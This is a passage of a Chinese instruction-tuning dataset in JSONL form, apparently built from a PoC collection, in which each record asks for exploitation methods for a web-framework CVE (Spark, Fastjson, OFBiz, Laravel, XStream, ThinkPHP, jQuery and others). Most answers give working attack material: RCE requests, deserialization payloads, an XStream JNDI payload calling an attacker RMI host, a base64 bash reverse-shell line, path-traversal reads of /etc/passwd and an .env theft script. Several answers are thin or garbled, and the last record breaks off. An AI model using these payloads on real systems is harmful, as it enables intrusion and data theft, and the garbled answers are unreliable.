  1086. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891\n漏洞描述:Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE\n影响版本:``` Spark Core - Apache <=3.0.3 3.1.1 <= Spark Core - Apache <=3.1.2 3.2.0 <= Spark Core - Apache <=3.2.1 ```\n网络测绘:``` app=\"APACHE-Spark\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-33891\n【POC利用方法】\n1. Spark Core - Apache <=3.0.3\n3.1.1 <= Spark Core - Apache <=3.1.2\n3.2.0 <= Spark Core - Apache <=3.2.1\n2. app=\"APACHE-Spark\"\n3. /jobs/?doAs=`touch /tmp/test.txt`\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891.md"}
    1087. 

  1087. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Fastjson 远程代码执行漏洞 CVE-2022-25845\n漏洞描述:Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列 化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可 以在特定依赖下利用此漏洞绕过默认 autoType 关闭限制,从而反序列化有安全风险的类。\n影响版本:``` Fastjson ≤ 1.2.80 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-25845\n【POC利用方法】\n1. Fastjson ≤ 1.2.80\n2. <dependency>\n    <groupId>com.alibaba</groupId>\n    <artifactId>fastjson</artifactId>\n    <version>1.2.82</version>\n</dependency>\n3. package com.example.fastjson;\n \nimport java.io.IOException;\n \npublic class Poc extends Exception {\n    public void setName(String str) {\n        try {\n            Runtime.getRuntime().exec(str);\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n    }\n}\npackage com.example.fastjson;\nimport com.alibaba.fastjson.JSON;\n \npublic class PocDemo {\n    public static void main(String[] args) {\n        String json = \"{\\\"@type\\\":\\\"java.lang.Exception\\\",\\\"@type\\\":\\\"com.example.fastjson.Poc\\\",\\\"name\\\":\\\"calc\\\"}\";\n        JSON.parse(json);\n    }\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Fastjson 远程代码执行漏洞 CVE-2022-25845.md"}
    1088. 

  1088. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OFBiz RMI反序列化漏洞 CVE-2021-26295\n漏洞描述:OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI。 近日,Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz,建议相关用户尽快测试漏洞修复的版本并及时升级。\n影响版本:``` Apache OFBiz < 17.12.06 ```\n网络测绘:``` app=\"Apache_OFBiz\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2021-26295\n【POC利用方法】\n1. Apache OFBiz < 17.12.06\n2. app=\"Apache_OFBiz\"\n3. docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache OFBiz RMI反序列化漏洞 CVE-2021-26295.md"}
    1089. 

  1089. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OfBiz 服务器端模板注入 SSTI\n漏洞描述:Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。 参考链接: - https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz\n影响版本:``` Apache OfBiz 17.12.01 ```\n网络测绘:``` app=\"Apache_OFBiz\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. Apache OfBiz 17.12.01\n2. app=\"Apache_OFBiz\"\n3. https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md"}
    1090. 

  1090. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Flink 目录遍历漏洞 CVE-2020-17519\n漏洞描述:2021年01月06日,360CERT监测发现`Apache Flink`发布了`Apache Flink 目录穿越漏洞`的风险通告,漏洞编号为`CVE-2020-17518,CVE-2020-17519`,漏洞等级:`高危`,漏洞评分:`8.5`。 远程攻击者通过`REST API`目录遍历,可造成`文件读取/写入`的影响。 Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。 参考: - https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801 - https://nvd.nist.gov/vuln/detail/CVE-2020-17519\n影响版本:``` Apache Flink 1.11.0 Apache Flink 1.11.1 Apache Flink 1.11.2 ```\n网络测绘:``` app=\"Apache Flink\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-17519\n【POC利用方法】\n1. Apache Flink 1.11.0\nApache Flink 1.11.1\nApache Flink 1.11.2\n2. app=\"Apache Flink\"\n3. docker-compose up -d\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Flink 目录遍历漏洞 CVE-2020-17519.md"}
    1091. 

  1091. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Laravel .env 配置文件泄露 CVE-2017-16894\n漏洞描述:Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息\n影响版本:``` Laravel framework <= 5.5.21 ```\n网络测绘:``` app=\"Laravel-Framework\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2017-16894\n【POC利用方法】\n1. Laravel framework <= 5.5.21\n2. app=\"Laravel-Framework\"\n3. import requests\nimport sys\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mVersion: Laravel framework <= 5.5.21                              \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/.env\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        if \"APP_NAME\" in response.text:\n            print(\"\\033[32m[o] 目标{}存在漏洞 \\033[0m\".format(target_url))\n            print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n        else:\n            print(\"\\033[31m[x] .env 文件请求失败 \\033[0m\")\n            sys.exit(0)\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Laravel .env 配置文件泄露 CVE-2017-16894.md"}
    1092. 

  1092. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Rails sprockets 任意文件读取漏洞 CVE-2018-3760\n漏洞描述:Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。\n影响版本:``` Sprockets < 3.7.1 ```\n网络测绘:``` title=\"Ruby On Rails\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2018-3760\n【POC利用方法】\n1. Sprockets < 3.7.1\n2. title=\"Ruby On Rails\"\n3. /assets/file:%2f%2f/etc/passwd\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Rails sprockets 任意文件读取漏洞 CVE-2018-3760.md"}
    1093. 

  1093. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Laravel Filemanager插件 download 任意文件读取漏洞 CVE-2022-40734\n漏洞描述:Laravel Filemanager插件 download 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感数据\n影响版本:``` Laravel Filemanager插件 ```\n网络测绘:``` \"Laravel Filemanager\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-40734\n【POC利用方法】\n1. Laravel Filemanager插件\n2. \"Laravel Filemanager\"\n3. /laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc/passwd\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Laravel Filemanager插件 download 任意文件读取漏洞 CVE-2022-40734.md"}
    1094. 

  1094. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Laravel Ignition 2.5.1 代码执行漏洞 CVE-2021-3129\n漏洞描述:Laravel是一个由Taylor Otwell所创建,免费的开源 PHP Web 框架。在开发模式下,Laravel使用了Ignition提供的错误页面,在Ignition 2.5.1及之前的版本中,有类似这样的代码: ``` $contents = file_get_contents($parameters['viewFile']); file_put_contents($parameters['viewFile'], $contents); ``` 攻击者可以通过`phar://`协议来执行反序列化操作,进而执行任意代码。 参考链接: - https://www.ambionics.io/blog/laravel-debug-rce - https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g - https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-3129.yaml\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2021-3129\n【POC利用方法】\n1. $contents = file_get_contents($parameters['viewFile']);\nfile_put_contents($parameters['viewFile'], $contents);\n2. docker-compose up -d\n3. POST /_ignition/execute-solution HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 328\n\n{\n  \"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\",\n  \"parameters\": {\n    \"variableName\": \"username\",\n    \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"\n  }\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Laravel Ignition 2.5.1 代码执行漏洞 CVE-2021-3129.md"}
    1095. 

  1095. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OfBiz 鉴权绕过导致命令执行 CVE-2023-51467\n漏洞描述:Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。 这个漏洞的原因是对于[CVE-2023-49070](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-49070)的不完全修复。在Apache OFBiz 18.12.10版本中,官方移除了可能导致RCE漏洞的XMLRPC组件,但没有修复权限绕过问题。来自长亭科技的安全研究员利用这一点找到了另一个可以导致RCE的方法:Groovy表达式注入。 参考连接: - [https://github.com/apache/ofbiz-framework/commit/d8b097f6717a4004acf023dfe929e0e41ad63faa](https://github.com/apache/ofbiz-framework/commit/d8b097f6717a4004acf023dfe929e0e41ad63faa) - [https://xz.aliyun.com/t/13211](https://xz.aliyun.com/t/13211) - [https://y4tacker.github.io/](https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/)\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2023-51467\n【POC利用方法】\n1. docker compose up -d\n2. ERROR MESSAGE\norg.apache.ofbiz.webapp.control.RequestHandlerException: Domain 60.204.216.3 not accepted to prevent host header injection. You need to set host-headers-allowed property in security.properties file.\n3. POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\nHost: localhost:8443\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 55\n\ngroovyProgram=throw+new+Exception('id'.execute().text);\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache OfBiz 鉴权绕过导致命令执行 CVE-2023-51467.md"}
    1096. 

  1096. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631\n漏洞描述:Apache Spark 是一种用于大数据工作负载的分布式开源处理系统。它使用内存中缓存和优化的查询执行方式,可针对任何规模的数据进行快速分析查询。它提供使用Java、Scala、Python 和 R 语言的开发 API,支持跨多个工作负载重用代码—批处理、交互式查询、实时分析、机器学习和图形处理等。当Spark任务的文件名可控时,`Utils.unpack`采用命令拼接的形式对tar文件进行解压,存在任意命令注入的风险。这是源于Hadoop中unTar函数存在问题,在其执行shell命令之前未正确转义文件名,直接拼接命令导致任意命令注入。\n影响版本:``` Apache Spark 3.1.2, 3.2.1, 3.3.0 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. Apache Spark 3.1.2, 3.2.1, 3.3.0\n2. hadoop-common-2.7.4.jar!/org/apache/hadoop/fs/FileUtil.class\n3. public static void unTar(File inFile, File untarDir) throws IOException {\n        if (!untarDir.mkdirs() && !untarDir.isDirectory()) {\n            throw new IOException(\"Mkdirs failed to create \" + untarDir);\n        } else {\n            boolean gzipped = inFile.toString().endsWith(\"gz\");\n            if (Shell.WINDOWS) {\n                unTarUsingJava(inFile, untarDir, gzipped);\n            } else {\n                unTarUsingTar(inFile, untarDir, gzipped);\n            }\n\n        }\n    }\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631.md"}
    1097. 

  1097. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:XStream 反序列化命令执行漏洞 CVE-2021-21351\n漏洞描述:XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用`javax.naming.ldap.Rdn$RdnEntry`及`javax.sql.rowset.BaseRowSet`构造JNDI注入,进而执行任意命令。 参考链接: - https://x-stream.github.io/CVE-2021-21351.html - https://paper.seebug.org/1543/ - https://www.veracode.com/blog/research/exploiting-jndi-injections-java - https://github.com/welk1n/JNDI-Injection-Exploit/\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2021-21351\n【POC利用方法】\n1. docker-compose up -d\n2. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C \"touch /tmp/awesome_poc\" -A 192.168.174.128\n3. POST / HTTP/1.1\nHost: your-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nConnection: close\nContent-Type: application/xml\nContent-Length: 3184\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://192.168.174.128:1099/tznmqn</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/XStream 反序列化命令执行漏洞 CVE-2021-21351.md"}
    1098. 

  1098. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Django Trunc(kind) and Extract(lookup_name) SQL注入漏洞 CVE-2022-34265\n漏洞描述:Django在2022年7月4日发布了安全更新,修复了在数据库函数`Trunc()`和`Extract()`中存在的SQL注入漏洞。 参考链接: - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-34265\n【POC利用方法】\n1. docker-compose up -d\n2. http://your-ip:8000/?date=xxxx'xxxx\n3. - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Django Trunc(kind) and Extract(lookup_name) SQL注入漏洞 CVE-2022-34265.md"}
    1099. 

  1099. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ThinkPHP5 SQL注入漏洞 && 敏感信息泄露\n漏洞描述:漏洞原理说明: - https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html - https://xz.aliyun.com/t/125\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. 访问`http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`,信息成功被爆出:\n3. - https://xz.aliyun.com/t/125\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/ThinkPHP5 SQL注入漏洞 && 敏感信息泄露.md"}
    1100. 

  1100. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Laravel 小于 8.4.2 Debug模式 _ignition 远程代码执行漏洞 CVE-2021-3129\n漏洞描述:Laravel 是一个免费的开源 PHP Web 框架,旨在实现的Web软件的MVC架构。2021年1月13日,阿里云应急响应中心监控到国外某安全研究团队披露了 Laravel <= 8.4.2 存在远程代码执行漏洞。当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意Log文件等方式触发Phar反序列化,从而造成远程代码执行,控制服务器。漏洞细节已在互联网公开。阿里云应急响应中心提醒 Laravel 用户尽快采取安全措施阻止漏洞攻击。\n影响版本:``` Laravel 框架 < 8.4.3 facade ignition 组件 < 2.5.2 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2021-3129\n【POC利用方法】\n1. Laravel 框架 < 8.4.3\nfacade ignition 组件 < 2.5.2\n2. https://github.com/SNCKER/CVE-2021-3129.git\ndocker-compose up -d\n3. <?php\n\nnamespace Facade\\Ignition\\Http\\Controllers;\n\nuse Facade\\Ignition\\Http\\Requests\\ExecuteSolutionRequest;\nuse Facade\\IgnitionContracts\\SolutionProviderRepository;\nuse Illuminate\\Foundation\\Validation\\ValidatesRequests;\n\nclass ExecuteSolutionController\n{\n    use ValidatesRequests;\n\n    public function __invoke(\n        ExecuteSolutionRequest $request,\n        SolutionProviderRepository $solutionProviderRepository\n    ) {\n        $solution = $request->getRunnableSolution();\n\n        $solution->run($request->get('parameters', []));\n\n        return response('');\n    }\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Laravel 小于 8.4.2 Debug模式 _ignition 远程代码执行漏洞 CVE-2021-3129.md"}
    1101. 

  1101. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Django < 2.0.8 任意URL跳转漏洞 CVE-2018-14574\n漏洞描述:Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。(由配置项中的`django.middleware.common.CommonMiddleware`、`APPEND_SLASH`来决定)。 在path开头为`//example.com`的情况下,Django没做处理,导致浏览器认为目的地址是绝对路径,最终造成任意URL跳转漏洞。 该漏洞利用条件是目标`URLCONF`中存在能匹配上`//example.com`的规则。\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2018-14574\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. 访问`http://your-ip:8000//www.example.com`,即可返回是301跳转到`//www.example.com/`:\n3. 环境启动后,访问`http://your-ip:8000`即可查看网站首页。\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Django  2.0.8 任意URL跳转漏洞 CVE-2018-14574.md"}
    1102. 

  1102. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980\n漏洞描述:Apache Commons Configuration 是 Apache 基金会下的一个开源项目组件。它提供了一种通用的方式,让 Java 开发者可以使用统一的接口读取不同类型的配置文件。 该漏洞是由于 Apache Commons Configuration 提供的 Configuration 变量解释功能存在缺陷,攻击者可利用该漏洞在特定情况下,构造恶意数据执行远程代码。\n影响版本:``` 2.4 <= Apache Commons Configuration <=2.7 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-33980\n【POC利用方法】\n1. 2.4 <= Apache Commons Configuration <=2.7\n2. # bash -i >& /dev/tcp/your-vps-ip/port 0>&1\nbash -c {echo,<YOUR_PAYLOAD_HERE>}|{base64,-d}|{bash,-i}\n3. <?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<configuration>\n        <path>${script:js:java.lang.Runtime.getRuntime().exec(\"bash -c {echo,<YOUR_PAYLOAD_HERE>}|{base64,-d}|{bash,-i}\")}</path>\n</configuration>\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980.md"}
    1103. 

  1103. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ThinkPHP 命令执行漏洞 CNVD-2022-86535\n漏洞描述:该漏洞是由于 Thinkphp 开启了多语言功能,并且对参数 lang 传参过滤不严谨,导致攻击者可利用该漏洞执行命令。\n影响版本:``` ThinkPHP >=V6.0.1,<=V6.0.13 ThinkPHP >=V5.0.X,<=V5.1.X ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. ThinkPHP >=V6.0.1,<=V6.0.13\nThinkPHP >=V5.0.X,<=V5.1.X\n2. /index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php\n3. - https://www.kancloud.cn/manual/thinkphp6_0/1037637\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md"}
    1104. 

  1104. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:jQuery XSS漏洞 CVE-2020-11022 11023\n漏洞描述:据NVD描述:在大于或等于1.2且在3.5.0之前的jQuery版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。\n影响版本:``` 3.5.0 > jQuery >= 1.2 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-11022\n【POC利用方法】\n1. 3.5.0 > jQuery >= 1.2\n2. PoC 1.\n<style><style /><img src=x onerror=alert(1)> \n\nPoC 2. (Only jQuery 3.x affected)\n<img alt=\"<x\" title=\"/><img src=x onerror=alert(1)>\">\n\nPoC 3.\n<option><style></option></select><img src=x onerror=alert(1)></style>\n3. rxhtmlTag = / <(?! area | br | col | embed | hr | img | input | link | meta | param)(([[ww:-] +)[^>] *)\\ /> / gi\n[。 ..]\nhtmlPrefilter:function(html){\n  return html.replace(rxhtmlTag,“ <$ 1> </ $ 2>”);\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/jQuery XSS漏洞 CVE-2020-11022 11023.md"}
    1105. 

  1105. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jackson-databind 反序列化漏洞 CVE-2017-7525 / CVE-2017-17485\n漏洞描述:Jackson-databind 支持 [Polymorphic Deserialization](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization) 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 `TemplatesImpl`,可以实现任意代码执行。 所以,本漏洞利用条件如下: - 开启 JacksonPolymorphicDeserialization,即调用以下任意方法 ```java objectMapper.enableDefaultTyping(); // default to using DefaultTyping.OBJECT_AND_NON_CONCRETE objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL); ``` - Target class 需要有无参 constructor - Target class 中需要需要有字段类型为 Interface、abstract class、Object,并且使用的 Gadget 需要为其子类 / 实现接口\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2017-7525\n【POC利用方法】\n1. objectMapper.enableDefaultTyping(); // default to using DefaultTyping.OBJECT_AND_NON_CONCRETE\n  objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);\n2. docker-compose up -d\n3. POST /exploit HTTP/1.1\nHost: your-vps-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: 